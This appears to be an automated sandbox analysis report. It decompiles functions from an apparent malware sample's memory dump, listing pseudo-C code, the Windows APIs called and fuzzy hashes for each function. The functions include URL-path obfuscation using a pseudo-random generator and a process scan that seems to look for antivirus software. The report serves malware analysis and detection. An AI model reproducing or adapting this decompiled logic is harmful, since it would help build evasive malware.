                                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          						_v8 = 4;
                                                          						_v16 = 0;
                                                          						if( *_t60() == 0) {
                                                          							_t39 = GetLastError();
                                                          							_v12 = _t39;
                                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                          								L15:
                                                          								return _v12;
                                                          							} else {
                                                          								goto L11;
                                                          							}
                                                          						}
                                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_v16 = 0;
                                                          							_v8 = 0;
                                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                          							_t58 = E0447A71F(_v8 + 1);
                                                          							if(_t58 == 0) {
                                                          								_v12 = 8;
                                                          							} else {
                                                          								_push( &_v16);
                                                          								_push( &_v8);
                                                          								_push(_t58);
                                                          								_push(0x16);
                                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          								if( *_t60() == 0) {
                                                          									E0447A734(_t58);
                                                          									_v12 = GetLastError();
                                                          								} else {
                                                          									 *((char*)(_t58 + _v8)) = 0;
                                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                          								}
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					}
                                                          					SetEvent( *(_t61 + 0x1c));
                                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                          					_v12 = _t56;
                                                          					if(_t56 != 0) {
                                                          						goto L15;
                                                          					}
                                                          					goto L3;
                                                          					L11:
                                                          					_t42 = E04475646( *(_t61 + 0x1c), _t59, 0xea60);
                                                          					_v12 = _t42;
                                                          				} while (_t42 == 0);
                                                          				goto L15;
                                                          			}
















                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04479259
                                                          • SetEvent.KERNEL32(?), ref: 04479269
                                                          • GetLastError.KERNEL32 ref: 044792F2
                                                            • Part of subcall function 04475646: WaitForMultipleObjects.KERNEL32(00000002,0447A8E3,00000000,0447A8E3,?,?,?,0447A8E3,0000EA60), ref: 04475661
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          • GetLastError.KERNEL32(00000000), ref: 04479327
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: 8bfd4222b359fa51c20ced76cbcd3ecd9f414b4f91b36e49f1adca340690fe31
                                                          • Instruction ID: 27f1cf2ce732004d7816e107d8d32051d3f24a40c99e6b9cffdb2fa9161d0e52
                                                          • Opcode Fuzzy Hash: 8bfd4222b359fa51c20ced76cbcd3ecd9f414b4f91b36e49f1adca340690fe31
                                                          • Instruction Fuzzy Hash: D631DCB5900349EFEF21DFE5D8C49EEB7B8EB08344F10496AE642E2251D734AA469B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E044736B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                          				intOrPtr _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				void* __esi;
                                                          				void* _t29;
                                                          				void* _t38;
                                                          				signed int* _t39;
                                                          				void* _t40;
                                                          
                                                          				_t36 = __ecx;
                                                          				_v32 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v12 = _a4;
                                                          				_t38 = E04473BB9(__ecx,  &_v32);
                                                          				if(_t38 != 0) {
                                                          					L12:
                                                          					_t39 = _a8;
                                                          					L13:
                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                          						_t16 =  &(_t39[1]); // 0x5
                                                          						_t23 = _t16;
                                                          						if( *_t16 != 0) {
                                                          							E04474F79(_t23);
                                                          						}
                                                          					}
                                                          					return _t38;
                                                          				}
                                                          				if(E0447A2F9(0x40,  &_v16) != 0) {
                                                          					_v16 = 0;
                                                          				}
                                                          				_t40 = CreateEventA(0x447d2ac, 1, 0,  *0x447d344);
                                                          				if(_t40 != 0) {
                                                          					SetEvent(_t40);
                                                          					Sleep(0xbb8);
                                                          					CloseHandle(_t40);
                                                          				}
                                                          				_push( &_v32);
                                                          				if(_a12 == 0) {
                                                          					_t29 = E0447A446(_t36);
                                                          				} else {
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t29 = E0447853F(_t36);
                                                          				}
                                                          				_t41 = _v16;
                                                          				_t38 = _t29;
                                                          				if(_v16 != 0) {
                                                          					E04474F14(_t41);
                                                          				}
                                                          				if(_t38 != 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					_t39 = _a8;
                                                          					_t38 = E044711EE( &_v32, _t39);
                                                          					goto L13;
                                                          				}
                                                          			}













                                                          APIs
                                                          • CreateEventA.KERNEL32(0447D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,044752AA,?,00000001,?), ref: 04473702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,044752AA,?,00000001,?,00000002,?,?,04475D5E,?), ref: 0447370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,044752AA,?,00000001,?,00000002,?,?,04475D5E,?), ref: 0447371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,044752AA,?,00000001,?,00000002,?,?,04475D5E,?), ref: 04473721
                                                            • Part of subcall function 0447A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,04473741,?,04473741,?,?,?,?,?,04473741,?), ref: 0447A520
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 3fd558a3815328779635e48f723ec879ab511abcb170e41f9865ef973ec36dd2
                                                          • Instruction ID: 38f7b93a3f95c3772093a9a46ca284d57aab19dc869b8d0886d30972441d73f7
                                                          • Opcode Fuzzy Hash: 3fd558a3815328779635e48f723ec879ab511abcb170e41f9865ef973ec36dd2
                                                          • Instruction Fuzzy Hash: 832153B2900259ABDF20BFE589C58EFB769EB44354B01842BEE11A7201D634B947DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E044717E5(unsigned int __eax, void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _t21;
                                                          				signed short _t23;
                                                          				char* _t27;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				unsigned int _t33;
                                                          				void* _t37;
                                                          				unsigned int _t38;
                                                          				void* _t41;
                                                          				void* _t42;
                                                          				int _t45;
                                                          				void* _t46;
                                                          
                                                          				_t42 = __eax;
                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                          				_t38 = __eax;
                                                          				_t30 = RtlAllocateHeap( *0x447d238, 0, (__eax >> 3) + __eax + 1);
                                                          				_v12 = _t30;
                                                          				if(_t30 != 0) {
                                                          					_v8 = _t42;
                                                          					do {
                                                          						_t33 = 0x18;
                                                          						if(_t38 <= _t33) {
                                                          							_t33 = _t38;
                                                          						}
                                                          						_t21 =  *0x447d250; // 0xfd3fe438
                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                          						 *0x447d250 = _t23;
                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                          						memcpy(_t30, _v8, _t45);
                                                          						_v8 = _v8 + _t45;
                                                          						_t27 = _t30 + _t45;
                                                          						_t38 = _t38 - _t45;
                                                          						_t46 = _t46 + 0xc;
                                                          						 *_t27 = 0x2f;
                                                          						_t13 = _t27 + 1; // 0x1
                                                          						_t30 = _t13;
                                                          					} while (_t38 > 8);
                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                          				}
                                                          				return _v12;
                                                          			}


















                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04471C49,00000000,?,?,044720C2,?,050195B0), ref: 044717F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04471808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04471C49,00000000,?,?,044720C2,?,050195B0), ref: 0447184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 0447186D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: a11363d7445836b4306a1b213b4ca0619b39fc166c74dc87dc4ec5a30371aad9
                                                          • Instruction ID: 7b27e93f8151ec6bc7c1b921b733a2e4740c4ce438f69dc2c38a019294d1a249
                                                          • Opcode Fuzzy Hash: a11363d7445836b4306a1b213b4ca0619b39fc166c74dc87dc4ec5a30371aad9
                                                          • Instruction Fuzzy Hash: 7F11CA72A00154AFE7108BA9DC84E9EBBBEDF84660B05017AF6059B250E7749D068790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E0447486F(char* __eax) {
                                                          				char* _t8;
                                                          				intOrPtr _t12;
                                                          				char* _t21;
                                                          				signed int _t23;
                                                          				char* _t24;
                                                          				signed int _t26;
                                                          				void* _t27;
                                                          
                                                          				_t21 = __eax;
                                                          				_push(0x20);
                                                          				_t23 = 1;
                                                          				_push(__eax);
                                                          				while(1) {
                                                          					_t8 = StrChrA();
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					_t23 = _t23 + 1;
                                                          					_push(0x20);
                                                          					_push( &(_t8[1]));
                                                          				}
                                                          				_t12 = E0447A71F(_t23 << 2);
                                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                          				if(_t12 != 0) {
                                                          					StrTrimA(_t21, 0x447c284);
                                                          					_t26 = 0;
                                                          					do {
                                                          						_t24 = StrChrA(_t21, 0x20);
                                                          						if(_t24 != 0) {
                                                          							 *_t24 = 0;
                                                          							_t24 =  &(_t24[1]);
                                                          							StrTrimA(_t24, 0x447c284);
                                                          						}
                                                          						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                          						_t26 = _t26 + 1;
                                                          						_t21 = _t24;
                                                          					} while (_t24 != 0);
                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                          				}
                                                          				return 0;
                                                          			}











                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,050195AC,?,04475D25,?,0447243F,050195AC,?,04475D25), ref: 04474889
                                                          • StrTrimA.SHLWAPI(?,0447C284,00000002,?,04475D25,?,0447243F,050195AC,?,04475D25), ref: 044748A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,04475D25,?,0447243F,050195AC,?,04475D25), ref: 044748B3
                                                          • StrTrimA.SHLWAPI(00000001,0447C284,?,04475D25,?,0447243F,050195AC,?,04475D25), ref: 044748C5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: c9c9a91882bceac5f3e26f42e316d44a797243567a26e0e572e396abdde67671
                                                          • Instruction ID: a951303074d73d38234743a03d4520ad7da90e4fa6d50857e687ffa3b8bb60ab
                                                          • Opcode Fuzzy Hash: c9c9a91882bceac5f3e26f42e316d44a797243567a26e0e572e396abdde67671
                                                          • Instruction Fuzzy Hash: 1D012875A017659FD6209F658C48E7BBBDCFF86AA4F12051AF941D7340EB64E80386A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E0447A65C() {
                                                          				char _v264;
                                                          				void* _v300;
                                                          				int _t8;
                                                          				intOrPtr _t9;
                                                          				int _t15;
                                                          				void* _t17;
                                                          
                                                          				_t15 = 0;
                                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                          				if(_t17 != 0) {
                                                          					_t8 = Process32First(_t17,  &_v300);
                                                          					while(_t8 != 0) {
                                                          						_t9 =  *0x447d2a8; // 0xb9a5a8
                                                          						_t2 = _t9 + 0x447ee34; // 0x73617661
                                                          						_push( &_v264);
                                                          						if( *0x447d0fc() != 0) {
                                                          							_t15 = 1;
                                                          						} else {
                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                          							continue;
                                                          						}
                                                          						L7:
                                                          						CloseHandle(_t17);
                                                          						goto L8;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				L8:
                                                          				return _t15;
                                                          			}










                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0447A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 0447A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 0447A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 0447A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: dd145ca916aa65c297d357144677cc1c31bae60f06b0cbf1450be7aeab7950e4
                                                          • Instruction ID: 362eaba81b6d5d50f8d01bd63046df6b7cdf2b868f5381ddc4e76d461bf176fe
                                                          • Opcode Fuzzy Hash: dd145ca916aa65c297d357144677cc1c31bae60f06b0cbf1450be7aeab7950e4
                                                          • Instruction Fuzzy Hash: C5F096766011146AEF20BAA69C89DEF776CDBC5215F010166E945E2200EA24E94B86A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04476840(void* __esi) {
                                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          
                                                          				_v4 = 0;
                                                          				memset(__esi, 0, 0x38);
                                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                                          				 *(__esi + 0x1c) = _t8;
                                                          				if(_t8 != 0) {
                                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                                          					 *(__esi + 0x20) = _t10;
                                                          					if(_t10 == 0) {
                                                          						CloseHandle( *(__esi + 0x1c));
                                                          					} else {
                                                          						_v4 = 1;
                                                          					}
                                                          				}
                                                          				return _v4;
                                                          			}







                                                          APIs
                                                          • memset.NTDLL ref: 0447684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 04476863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04476870
                                                          • CloseHandle.KERNEL32(?), ref: 04476882
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 89a1696cc8c5043104d918fadc7e6130a40835eddd9a4fc599905e43d5cee548
                                                          • Instruction ID: a1c4501c6ce93e050a7d105e044a5c3ae0272506700ec6b6f4fcf57d21242ea6
                                                          • Opcode Fuzzy Hash: 89a1696cc8c5043104d918fadc7e6130a40835eddd9a4fc599905e43d5cee548
                                                          • Instruction Fuzzy Hash: 41F0E9F110170C7FE7206F62DCC4C27BBACEB511EDB124A2EF04681101C635BC064BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04471B42() {
                                                          				void* _t1;
                                                          				intOrPtr _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t11;
                                                          
                                                          				_t1 =  *0x447d26c; // 0x2cc
                                                          				if(_t1 == 0) {
                                                          					L8:
                                                          					return 0;
                                                          				}
                                                          				SetEvent(_t1);
                                                          				_t11 = 0x7fffffff;
                                                          				while(1) {
                                                          					SleepEx(0x64, 1);
                                                          					_t5 =  *0x447d2bc; // 0x0
                                                          					if(_t5 == 0) {
                                                          						break;
                                                          					}
                                                          					_t11 = _t11 - 0x64;
                                                          					if(_t11 > 0) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				_t6 =  *0x447d26c; // 0x2cc
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x447d238; // 0x4c20000
                                                          				if(_t7 != 0) {
                                                          					HeapDestroy(_t7);
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • SetEvent.KERNEL32(000002CC,00000001,04474F0E), ref: 04471B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04471B5C
                                                          • CloseHandle.KERNEL32(000002CC), ref: 04471B7D
                                                          • HeapDestroy.KERNEL32(04C20000), ref: 04471B8D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: bf914219129e5bd52b802c0b67133e3b638acdcfe504286f3577089e858349ea
                                                          • Instruction ID: eedf1a27abdb1882157a227d3d454d4fb7ffe87f0bf454093ee9f3785ae679e5
                                                          • Opcode Fuzzy Hash: bf914219129e5bd52b802c0b67133e3b638acdcfe504286f3577089e858349ea
                                                          • Instruction Fuzzy Hash: 8CF030B1A1135197FF105B75ED88E977B98EF047617080211B905E7790EB38ED4796A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E044723F4(void** __esi) {
                                                          				char* _v0;
                                                          				intOrPtr _t4;
                                                          				intOrPtr _t6;
                                                          				void* _t8;
                                                          				intOrPtr _t11;
                                                          				void* _t12;
                                                          				void** _t14;
                                                          
                                                          				_t14 = __esi;
                                                          				_t4 =  *0x447d32c; // 0x50195b0
                                                          				__imp__(_t4 + 0x40);
                                                          				while(1) {
                                                          					_t6 =  *0x447d32c; // 0x50195b0
                                                          					_t1 = _t6 + 0x58; // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t8 =  *_t14;
                                                          				if(_t8 != 0 && _t8 != 0x447d030) {
                                                          					HeapFree( *0x447d238, 0, _t8);
                                                          				}
                                                          				_t14[1] = E0447486F(_v0, _t14);
                                                          				_t11 =  *0x447d32c; // 0x50195b0
                                                          				_t12 = _t11 + 0x40;
                                                          				__imp__(_t12);
                                                          				return _t12;
                                                          			}











                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(05019570), ref: 044723FD
                                                          • Sleep.KERNEL32(0000000A,?,04475D25), ref: 04472407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04475D25), ref: 0447242F
                                                          • RtlLeaveCriticalSection.NTDLL(05019570), ref: 0447244B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 7a6b968c7e192ef469ab6c8d93d9fdc9d593c392cab2bdc21eceddb59b13e103
                                                          • Instruction ID: c1414be776e7b5e3664277cf43cf063a2680e35821656746e9639579e6ead146
                                                          • Opcode Fuzzy Hash: 7a6b968c7e192ef469ab6c8d93d9fdc9d593c392cab2bdc21eceddb59b13e103
                                                          • Instruction Fuzzy Hash: 3AF058B0A002809BFB209FA8EA89F5A77E4FF08740B008446F505D6252CB28FC43CB25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E04476702() {
                                                          				void* _v0;
                                                          				void** _t3;
                                                          				void** _t5;
                                                          				void** _t7;
                                                          				void** _t8;
                                                          				void* _t10;
                                                          
                                                          				_t3 =  *0x447d32c; // 0x50195b0
                                                          				__imp__( &(_t3[0x10]));
                                                          				while(1) {
                                                          					_t5 =  *0x447d32c; // 0x50195b0
                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t7 =  *0x447d32c; // 0x50195b0
                                                          				_t10 =  *_t7;
                                                          				if(_t10 != 0 && _t10 != 0x447e81a) {
                                                          					HeapFree( *0x447d238, 0, _t10);
                                                          					_t7 =  *0x447d32c; // 0x50195b0
                                                          				}
                                                          				 *_t7 = _v0;
                                                          				_t8 =  &(_t7[0x10]);
                                                          				__imp__(_t8);
                                                          				return _t8;
                                                          			}










                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(05019570), ref: 0447670B
                                                          • Sleep.KERNEL32(0000000A,?,04475D25), ref: 04476715
                                                          • HeapFree.KERNEL32(00000000,?,?,04475D25), ref: 04476743
                                                          • RtlLeaveCriticalSection.NTDLL(05019570), ref: 04476758
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E04475AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                          				intOrPtr* _v8;
                                                          				void* _t17;
                                                          				intOrPtr* _t22;
                                                          				void* _t27;
                                                          				char* _t30;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t37;
                                                          				void* _t39;
                                                          				int _t42;
                                                          
                                                          				_t17 = __eax;
                                                          				_t37 = 0;
                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                          				_t2 = _t17 + 1; // 0x1
                                                          				_t28 = _t2;
                                                          				_t34 = E0447A71F(_t2);
                                                          				if(_t34 != 0) {
                                                          					_t30 = E0447A71F(_t28);
                                                          					if(_t30 == 0) {
                                                          						E0447A734(_t34);
                                                          					} else {
                                                          						_t39 = _a4;
                                                          						_t22 = E0447A782(_t39);
                                                          						_v8 = _t22;
                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                          							_a4 = _t39;
                                                          						} else {
                                                          							_t26 = _t22 + 2;
                                                          							_a4 = _t22 + 2;
                                                          							_t22 = E0447A782(_t26);
                                                          							_v8 = _t22;
                                                          						}
                                                          						if(_t22 == 0) {
                                                          							__imp__(_t34, _a4);
                                                          							 *_t30 = 0x2f;
                                                          							 *((char*)(_t30 + 1)) = 0;
                                                          						} else {
                                                          							_t42 = _t22 - _a4;
                                                          							memcpy(_t34, _a4, _t42);
                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                          							__imp__(_t30, _v8);
                                                          						}
                                                          						 *_a8 = _t34;
                                                          						_t37 = 1;
                                                          						 *_a12 = _t30;
                                                          					}
                                                          				}
                                                          				return _t37;
                                                          			}















                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04473E08,?,?,?,?,00000102,044767B8,?,?,00000000), ref: 04475AFD
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                            • Part of subcall function 0447A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04475B2B,00000000,00000001,00000001,?,?,04473E08,?,?,?,?,00000102), ref: 0447A790
                                                            • Part of subcall function 0447A782: StrChrA.SHLWAPI(?,0000003F,?,?,04473E08,?,?,?,?,00000102,044767B8,?,?,00000000,00000000), ref: 0447A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04473E08,?,?,?,?,00000102,044767B8,?), ref: 04475B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04475B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04475B77
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E044745C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				void* _v8;
                                                          				void* _t18;
                                                          				int _t25;
                                                          				int _t29;
                                                          				int _t34;
                                                          
                                                          				_t29 = lstrlenW(_a4);
                                                          				_t25 = lstrlenW(_a8);
                                                          				_t18 = E0447A71F(_t25 + _t29 + _t25 + _t29 + 2);
                                                          				_v8 = _t18;
                                                          				if(_t18 != 0) {
                                                          					_t34 = _t29 + _t29;
                                                          					memcpy(_t18, _a4, _t34);
                                                          					_t10 = _t25 + 2; // 0x2
                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                          				}
                                                          				return _v8;
                                                          			}









                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0501935C,?,04478D93,004F0053,0501935C,?,?,?,?,?,?,0447523E), ref: 044745D6
                                                          • lstrlenW.KERNEL32(04478D93,?,04478D93,004F0053,0501935C,?,?,?,?,?,?,0447523E), ref: 044745DD
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,04478D93,004F0053,0501935C,?,?,?,?,?,?,0447523E), ref: 044745FD
